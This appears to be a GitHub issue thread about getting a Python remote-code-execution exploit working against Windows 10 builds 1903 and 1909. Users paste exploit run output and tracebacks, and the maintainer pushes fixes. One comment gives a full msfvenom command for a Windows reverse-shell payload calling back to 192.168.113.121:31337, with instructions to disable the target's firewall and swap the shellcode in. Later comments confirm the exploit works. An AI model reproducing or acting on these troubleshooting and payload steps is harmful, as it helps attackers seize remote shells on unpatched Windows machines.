Exploit doesn't work
0xFF1E071F opened this issue · comments
I am using py3.8.
Host machine: Linux.
Target machine: Win10 b1903.
They are on the same virtual network.
I got this error when I am trying to run exploit.py:
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7a180000000
[+] ntoskrnl entry at fffff8054d392010
[+] found PML4 self-ref entry 1e5
[+] found HalpInterruptController at fffff7a1800015b8
Traceback (most recent call last):
  File "exploit.py", line 475, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 438, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 351, in search_hal_heap
    buff = read_physmem_primitive(ip, port, index + i + 0x38)
  File "exploit.py", line 205, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 220, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out
edit: fix right error
I have this problem, so what should I do?
Unfortunately I couldn't find a solution yet :/
nvm, it's a bug. I changed the HAL heap search and forgot to update that case. Will post a fix shortly.
Fix for this error has been pushed.
Thank you, I have another error now:
python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes
OK ppl, if you are reading this don't forget to
- close Win 10 b1903/1909 firewall
- run msfvenom as:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
and replace the USER_PAYLOAD with this shellcode.
This code now works on b1903.
And I cannot make it exploit 1909 machines.
OK, when I use the exploit on b1909 machines, the Python code works normally (I mean no error output). But the b1909 machine crashes and reboots.
Now works on 1909, thanks.